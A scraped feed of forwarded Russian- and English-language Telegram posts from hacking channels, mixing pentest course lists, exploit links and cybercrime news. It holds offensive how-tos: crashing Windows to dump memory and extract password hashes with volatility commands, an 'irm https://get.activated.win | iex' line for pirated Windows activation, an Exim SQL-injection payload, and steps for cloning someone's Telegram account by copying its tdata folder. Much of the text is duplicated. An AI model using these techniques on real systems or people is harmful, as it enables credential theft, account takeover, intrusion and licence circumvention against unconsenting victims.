Forwarded from DefenseEvasion
This media is not supported in your browser
VIEW IN TELEGRAM
💀 Windows | Get passwords no one notices 🔑
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
3️⃣Launch volatility
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
C:\Windows\MEMORY.DMP
file- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
C:\WIndows\MEMORY.DMP
3️⃣Launch volatility
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
Forwarded from Life-Hack - Хакер
Наш бесплатный курс "Тестирование на проникновение" подошел к концу. Вот полный список статей, которые помогут вам начать свой путь в #Pentest.
• Моделирование атаки - тестрирование на проникновение.
• Основные этапы тестирования.
• Сбор информации: 1 Часть.
• Сбор информации: 2 Часть.
• Сбор информации: 3 Часть.
• Обнаружение уязвимостей.
• Подбор паролей.
• Обратные оболочки и полезные нагрузки.
• Эксплуатация уязвимостей: 1 Часть.
• Эксплуатация уязвимостей: 2 Часть.
• Уклонение от средств защиты: 1 Часть.
• Уклонение от средств защиты: 2 Часть.
• Уклонение от средств защиты: 3 Часть.
• С2 (Command and Control) сервер.
• Основы Active Directory: 1 Часть.
• Основы Active Directory: 2 Часть.
• Kerberos, NTLM, DNS, LDAP.
• Пользовательские и машинные учетные записи.
• Права и привилегии в Active Directory.
• Небезопасные права доступа ACL.
• Active Directory Domain Enumeration
• Bloodhound
• AS-REP Roasting
• Kerberoasting
• Неограниченное делегирование.
• Ограниченное делегирование.
• Ограниченное делегирование на основе ресурсов.
• DCShadow.
• Pass-the-hash
• Password Spray
• Windows Server Update Services (WSUS)
• System Center Configuration Manager (SCCM)
• Взлом MSSQL
• Responder
• Netexec
• Крадем учетные данные Windows
• Zerologon
• PetitPotam
• Skeleton Key
• RouterSploit
• Получение DA через принтер
• DCSync
• SIDHistory
• AdminSDHolder
• Silver Ticket
• Golden Ticket
• Diamond Ticket
• Sapphire Ticket
Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!
#статья@haccking #обучениеPentest@haccking #AD
LH | Новости | Курсы | OSINT
• Моделирование атаки - тестрирование на проникновение.
• Основные этапы тестирования.
• Сбор информации: 1 Часть.
• Сбор информации: 2 Часть.
• Сбор информации: 3 Часть.
• Обнаружение уязвимостей.
• Подбор паролей.
• Обратные оболочки и полезные нагрузки.
• Эксплуатация уязвимостей: 1 Часть.
• Эксплуатация уязвимостей: 2 Часть.
• Уклонение от средств защиты: 1 Часть.
• Уклонение от средств защиты: 2 Часть.
• Уклонение от средств защиты: 3 Часть.
• С2 (Command and Control) сервер.
• Основы Active Directory: 1 Часть.
• Основы Active Directory: 2 Часть.
• Kerberos, NTLM, DNS, LDAP.
• Пользовательские и машинные учетные записи.
• Права и привилегии в Active Directory.
• Небезопасные права доступа ACL.
• Active Directory Domain Enumeration
• Bloodhound
• AS-REP Roasting
• Kerberoasting
• Неограниченное делегирование.
• Ограниченное делегирование.
• Ограниченное делегирование на основе ресурсов.
• DCShadow.
• Pass-the-hash
• Password Spray
• Windows Server Update Services (WSUS)
• System Center Configuration Manager (SCCM)
• Взлом MSSQL
• Responder
• Netexec
• Крадем учетные данные Windows
• Zerologon
• PetitPotam
• Skeleton Key
• RouterSploit
• Получение DA через принтер
• DCSync
• SIDHistory
• AdminSDHolder
• Silver Ticket
• Golden Ticket
• Diamond Ticket
• Sapphire Ticket
Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!
#статья@haccking #обучениеPentest@haccking #AD
LH | Новости | Курсы | OSINT
Forwarded from Life-Hack - Хакер
Whatsapp Mobile Tools
#Whatsapp #OSINT #полезное
Инструмент для извлечения данных профиля пользователя Whatsapp. Позволит узнать публичное имя, статус, изображение профиля, действителен ли номер WhatsApp. Проверку можно осуществлять прямо в браузере, без создания аккаунта в WhatsApp.
Ссылка на сервис
LH | Новости | Курсы | OSINT
#Whatsapp #OSINT #полезное
Инструмент для извлечения данных профиля пользователя Whatsapp. Позволит узнать публичное имя, статус, изображение профиля, действителен ли номер WhatsApp. Проверку можно осуществлять прямо в браузере, без создания аккаунта в WhatsApp.
Ссылка на сервис
LH | Новости | Курсы | OSINT
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Для изменения пароля пользователя AD, если есть на это право. Утилита написана на С.
https://github.com/decoder-it/ChgPass
#ad #pentest #acl
https://github.com/decoder-it/ChgPass
#ad #pentest #acl
Forwarded from Cybred
Silently Install Chrome Extension For Persistence
Преимущества:
— не использует командную строку
— оставляет реестр нетронутым
— может быть установлен с открытым браузером
— стабилен и сохраняет постоянство
research // poc
Я занимаюсь Red Team 10 лет и сегодня расскажу, как мне удалось найти способ максимально скрытно установить расширение для Chrome с обходом всех IOC, известных в настоящее время.
Преимущества:
— не использует командную строку
— оставляет реестр нетронутым
— может быть установлен с открытым браузером
— стабилен и сохраняет постоянство
research // poc
Forwarded from Волосатый бублик
[ Active Directory Domain Services Elevation of Privilege Vulnerability New — CVE-2025-21293 ]
«Network Configuration Operators» group privilege escalation
CVE: https://www.cve.org/CVERecord?id=CVE-2025-21293
MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21293
Blog with a PoC code: https://birkep.github.io/posts/Windows-LPE
«Network Configuration Operators» group privilege escalation
CVE: https://www.cve.org/CVERecord?id=CVE-2025-21293
MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21293
Blog with a PoC code: https://birkep.github.io/posts/Windows-LPE
Forwarded from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
👍3
Forwarded from Social Engineering
📦 PwnBox: реализуем устройство для пентеста Wi-Fi сетей.
• Автор этого репозитория собрал устройство, которое отлично подходит для пентеста Wi-Fi сетей. Реализация включает в себя несколько донглов от Alfa, Raspberry Pi, соответствующее ПО и адаптер от BrosTrend. Несмотря на то, что данной реализации уже достаточно лет, логика и схема для создания подобного устройства остается прежней, нужно только поменять донглы от Альфы на наиболее подходящие...
• Кстати, знаете почему вардрайвинга советуют донглы от Alfa Networks? Этот производитель специализируется на беспроводном оборудовании, причем делает его чуть лучше (и дороже) других. Например, во многих адаптерах встречается экранирование (повышает чувствительность приемника) или встроенный усилитель (увеличивает пиковую мощность передатчика). Почти все модели оснащены съемными антеннами (мы можем прикрутить свою, более подходящую). Для удобства выбора есть даже специальный раздел Kali WiFi USB, где указаны адаптеры, гарантированно работающие в Kali Linux в режиме мониторинга. В общем и целом, Альфа - это как бывшая cisco для админов.
➡ https://github.com/koutto/pi-pwnbox
• Дополнительно:
➡ Анализ безопасности Wi-Fi: подробное исследование методологии взлома протоколов WPA2-Personal / Enterprise и WPA3 (какие атаки и уязвимости существуют, и какой инструментарий применяется для их эксплуатации);
➡ Пентест Wi-Fi: полезный чек-лист, который содержит актуальные советы и хитрости на тему пентеста Wi-Fi сетей;
➡ Инструменты для пентеста Wi-Fi: продолжение поста выше, статья включает в себя максимально полный список инструментов для анализа защищенности Wi-Fi;
➡ Useful Wireless Links: учебные пособия, справочники, калькуляторы, софт, гаджеты и многое другое.
S.E. ▪️ infosec.work ▪️ VT
• Автор этого репозитория собрал устройство, которое отлично подходит для пентеста Wi-Fi сетей. Реализация включает в себя несколько донглов от Alfa, Raspberry Pi, соответствующее ПО и адаптер от BrosTrend. Несмотря на то, что данной реализации уже достаточно лет, логика и схема для создания подобного устройства остается прежней, нужно только поменять донглы от Альфы на наиболее подходящие...
• Кстати, знаете почему вардрайвинга советуют донглы от Alfa Networks? Этот производитель специализируется на беспроводном оборудовании, причем делает его чуть лучше (и дороже) других. Например, во многих адаптерах встречается экранирование (повышает чувствительность приемника) или встроенный усилитель (увеличивает пиковую мощность передатчика). Почти все модели оснащены съемными антеннами (мы можем прикрутить свою, более подходящую). Для удобства выбора есть даже специальный раздел Kali WiFi USB, где указаны адаптеры, гарантированно работающие в Kali Linux в режиме мониторинга. В общем и целом, Альфа - это как бывшая cisco для админов.
• Дополнительно:
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from TelAnalysis
🛠 Hiren’s BootCD PE – незаменимый инструмент для ИБ, OSINT и системных администраторов
Hiren’s BootCD PE – это мощный загрузочный диск на базе Windows 10 PE, включающий десятки инструментов для диагностики, восстановления данных и безопасности.
🔹 Для сисадминов: тестирование железа, сброс паролей, клонирование дисков.
🔹 Для ИБ-специалистов: анализ дисков, поиск уязвимостей, удаление вредоносного ПО.
🔹 Для OSINT: восстановление удаленных файлов, анализ сетевой активности, forensic-инструменты.
Источник
⚡️ Работает без установки, прямо с флешки – мастхэв в арсенале любого IT-специалиста! 🚀
TelAnalysis
Hiren’s BootCD PE – это мощный загрузочный диск на базе Windows 10 PE, включающий десятки инструментов для диагностики, восстановления данных и безопасности.
🔹 Для сисадминов: тестирование железа, сброс паролей, клонирование дисков.
🔹 Для ИБ-специалистов: анализ дисков, поиск уязвимостей, удаление вредоносного ПО.
🔹 Для OSINT: восстановление удаленных файлов, анализ сетевой активности, forensic-инструменты.
Источник
⚡️ Работает без установки, прямо с флешки – мастхэв в арсенале любого IT-специалиста! 🚀
TelAnalysis
👍1
Forwarded from КиберТопор
Конец лицензионной Windows: хакерская группировка Massgrave выкатила способ взломать Windows раз и навсегда.
Они создали хак на основе эксплойта TSforge, который позволяет активировать любую версию Windows и Office: он обходит защиту и делает активацию вечной.
Что нужно делать:
Хак с GitHub забираем отсюда:
Разбираемся, как работает TSforge здесь:
🕹КиберТопор — Подписаться
Они создали хак на основе эксплойта TSforge, который позволяет активировать любую версию Windows и Office: он обходит защиту и делает активацию вечной.
Что нужно делать:
— Запустить PowerShell от имени администратора;
— Вставить следующую команду:irm https://get.activated.win | iex
;
— Запускаем скрипт и радуемся лицензионной винде.
Хак с GitHub забираем отсюда:
https://github.com/massgravel/Microsoft-Activation-Scripts.
Разбираемся, как работает TSforge здесь:
https://massgrave.dev/blog/tsforge
🕹КиберТопор — Подписаться
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.
Для устранения проблемы рекомендуется обновиться до версии 4.98.1.
Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
ETRN #',1); ## INSERT SQL HERE ## /*
Для устранения проблемы рекомендуется обновиться до версии 4.98.1.
Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
Forwarded from BEHOLDERISHERE.сonsulting (Beholder Is Here)
This media is not supported in your browser
VIEW IN TELEGRAM
КАК ПОЛУЧИТЬ ДОСТУП К ТЕЛЕГРАМ ПЕРЕПИСКЕ.
Часто так случается, что необходимо получить доступ к чатам и группам сервиса Телеграм. И тут нам очень может повезти, если нам попадает в руки компьютер, на котором может быть установлена десктопная версия Телеграм - клиента.
Для того чтобы нам сделать дубликат телеграм-аккаунта, необходимо найти на компьютере папку находящуюся по пути:
🔻C:\Users\имя пользователя\AppData\Roaming\Telegram Desktop\tdata - если вы в Windows
🔻~/Library/Application Support/Telegram/tdata - если вы в macOS
🔻~/.config/systemd/user/Telegram/tdata или ~/.config/Telegram/tdata - если вы в Linux (в зависимости от дистрибутива)
...и скачать полностью папку tdata.
Далее необходимо скачать портативную версию Телеграм с сайта
А после разархивации архива в любом месте поместить папку tdata в папку с портативной версией Телеграм.
Все! теперь у вас полный дубликат аккаунта.
Так же вы можете воспользоваться парсером который будет отличным подспорьем для исследования пользователей определенного ТГ-аккаунта.
🔴НАПОМИНАНИЕ🔴
Дублирование чужих аккаунтов карается статьей 138 УК РФ. Информация из этого поста дана исключительно в образовательных целях для осуществления ОРМ теми, кому это разрешено законом той страны в которой он это делает.
Обратиться за консультацией | Инструментарий
Часто так случается, что необходимо получить доступ к чатам и группам сервиса Телеграм. И тут нам очень может повезти, если нам попадает в руки компьютер, на котором может быть установлена десктопная версия Телеграм - клиента.
Для того чтобы нам сделать дубликат телеграм-аккаунта, необходимо найти на компьютере папку находящуюся по пути:
🔻C:\Users\имя пользователя\AppData\Roaming\Telegram Desktop\tdata - если вы в Windows
🔻~/Library/Application Support/Telegram/tdata - если вы в macOS
🔻~/.config/systemd/user/Telegram/tdata или ~/.config/Telegram/tdata - если вы в Linux (в зависимости от дистрибутива)
...и скачать полностью папку tdata.
Далее необходимо скачать портативную версию Телеграм с сайта
А после разархивации архива в любом месте поместить папку tdata в папку с портативной версией Телеграм.
Все! теперь у вас полный дубликат аккаунта.
Так же вы можете воспользоваться парсером который будет отличным подспорьем для исследования пользователей определенного ТГ-аккаунта.
🔴НАПОМИНАНИЕ🔴
Дублирование чужих аккаунтов карается статьей 138 УК РФ. Информация из этого поста дана исключительно в образовательных целях для осуществления ОРМ теми, кому это разрешено законом той страны в которой он это делает.
Обратиться за консультацией | Инструментарий
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Decrypting Yandex Browser passwords
Soft: https://github.com/Goodies365/YandexDecrypt
@exited3n переписал на python:
Soft: https://github.com/akhomlyuk/Ya_Decrypt
P.S. Yandex Doc: https://yandex.com/support/browser-passwords-crypto/ru/with-master
#creds #pentest #redteam #ad
Soft: https://github.com/Goodies365/YandexDecrypt
@exited3n переписал на python:
Soft: https://github.com/akhomlyuk/Ya_Decrypt
P.S. Yandex Doc: https://yandex.com/support/browser-passwords-crypto/ru/with-master
#creds #pentest #redteam #ad
Forwarded from bin
Арестован администратор крупнейшего ИБ сообщества – XSS.IS
Насколько это правда или нет – неизвестно⚠️ , у меня форум спокойно открывается. Если это действительно так, то я сильно удивлен, ведь манифест форума запрещал работу по странам СНГ и Украине.
Но как мы знаем, Украина это плотное сотрудничество со спец. службами стран Евросоюза в том числе, а значит и администрировать такой ресурс из УА крайне опасно.
Полагаю, будь он в РФ, он был бы в безопасности.
hashbin.t.me
XSS.IS - Администрация арестованаУкраинскимиспец.службами.
В Киеве арестовали админа российского даркнет-форума
В результате длительного расследования, проведенного французскими властями в сотрудничестве украинскими правоохранительными органами и Европолом, был арестован администратор xss.is, одной из самых влиятельных русскоязычных платформ киберпреступности в мире.
За 20 лет своей незаконной деятельности киберпреступник заработал более 7 млн. евро.
По словам инсайдера, операция стала результатом работы французской Brigade de Lutte Contre la Cybercriminalité (BL2C), передавшей СБУ оперативную информацию. В рамках совместной подготовки французские офицеры прибыли в Киев, где сегодня и был проведён экшн-дэй совместно с Департаментом СБУ (Контрразведывательной защиты интересов). Правоохранительные органы конфисковали домены XSS — на момент публикации он недоступен, на ряде доменов отображается сообщение о блокировке.
Насколько это правда или нет – неизвестно
Но как мы знаем, Украина это плотное сотрудничество со спец. службами стран Евросоюза в том числе, а значит и администрировать такой ресурс из УА крайне опасно.
Полагаю, будь он в РФ, он был бы в безопасности.
hashbin.t.me
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from bin
bin
Арестован администратор крупнейшего ИБ сообщества – XSS.IS XSS.IS - Администрация арестована Украинскими спец.службами. В Киеве арестовали админа российского даркнет-форума В результате длительного расследования, проведенного французскими властями в сотрудничестве…
– Расследование началось 2 июля 2021 года
– Основной упор был в рансомы, несмотря на запрет этой темы в мае 2021 года
– Успех правоохранителей заключался в том, что они смогли взломать Jabber-сервер thesecure.biz и отслеживать все сообщения пользователей
– Этот взлом помог отследить множество эпизодов с рансомами, на основании чего был вывод о заработанных 7 млн. евро администрацией форума
– С сентября 2024 правоохранители уже разрабатывали администратора и знали его личность
– Подозреваемый арестован вчера в Киеве при поддержке Европола
– Есть подозрение на агентуру среди администрации
– XSS может ждать то же, что и было провернуто с BreachForums, когда после взлома пошла волна задержаний по всему миру
– Через TOR вроде пока работает. Может открываться из клира из-за запоздалых DNS
— Комментарий от даталикса: t.me/LeakAlarm/47
hashbin.t.me
– Основной упор был в рансомы, несмотря на запрет этой темы в мае 2021 года
– Успех правоохранителей заключался в том, что они смогли взломать Jabber-сервер thesecure.biz и отслеживать все сообщения пользователей
– Этот взлом помог отследить множество эпизодов с рансомами, на основании чего был вывод о заработанных 7 млн. евро администрацией форума
– С сентября 2024 правоохранители уже разрабатывали администратора и знали его личность
– Подозреваемый арестован вчера в Киеве при поддержке Европола
– Есть подозрение на агентуру среди администрации
– XSS может ждать то же, что и было провернуто с BreachForums, когда после взлома пошла волна задержаний по всему миру
— Комментарий от даталикса: t.me/LeakAlarm/47
hashbin.t.me